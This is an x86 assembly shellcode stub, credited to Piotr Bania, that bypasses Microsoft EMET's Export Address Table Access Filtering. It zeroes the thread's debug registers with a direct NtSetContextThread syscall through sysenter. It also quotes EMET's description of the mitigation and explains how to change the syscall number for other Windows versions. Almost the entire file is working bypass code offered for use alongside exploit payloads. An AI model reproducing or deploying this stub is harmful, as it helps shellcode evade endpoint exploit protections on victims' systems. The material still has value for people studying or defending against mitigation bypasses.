; BYPASSING EMET Export Address Table Access Filtering feature ; ------------------------------------------------------------------ ; just a simple stub for shellcode that erases debug registers ; therefore no more emet breakpoints (no EAF anymore) ; if you want to use it on other systems (than XP) just change the ; NtSetContextThread_XP syscall value. ; ------------------------------------------------------------------ ; ; and just for you information what is EAF (from the help file): ; ; In order to do something "useful", shellcode generally needs to call ; Windows APIs. However, in order to call an API, shellcode must first ; find the address where that API has been loaded. To do this the vast ; majority of shellcode iterates through the export address table of all ; loaded modules, looking for modules that contain useful APIs. Typically ; this involves kernel32.dll or ntdll.dll. Once an interesting module has ; been found, the shellcode can then figure out the address where an API ; in that module resides. This mitigation filters accesses to the Export ; Address Table (EAT), allowing or disallowing the read/write access based ; on the calling code. With EMET in place, most of today’s shellcode will ; be blocked when it tries to lookup the APIs needed for its payload. ; ; - Piotr Bania / www.piotrbania.com CONTEXT_SIZE equ 0000002cch CURRENT_THREAD equ 0FFFFFFFEh NtSetContextThread_XP equ 0000000D5h mov ebx, esp sub esp, CONTEXT_SIZE mov dword ptr [esp], CONTEXT_DEBUG_REGISTERS ; well zeroing entire struct is not necessary but who cares. mov edi, esp mov ecx, CONTEXT_SIZE add edi, 4 sub ecx, 4 xor eax,eax rep stosb push esp ; context push CURRENT_THREAD call get_delta get_delta: pop edx lea eax, [edx + (offset my_ret - offset get_delta)] push eax push eax mov edx, esp mov eax, NtSetContextThread_XP db 0Fh, 034h ; sysenter my_ret: mov esp, ebx ; *** you are now free, no debug breakpoints ***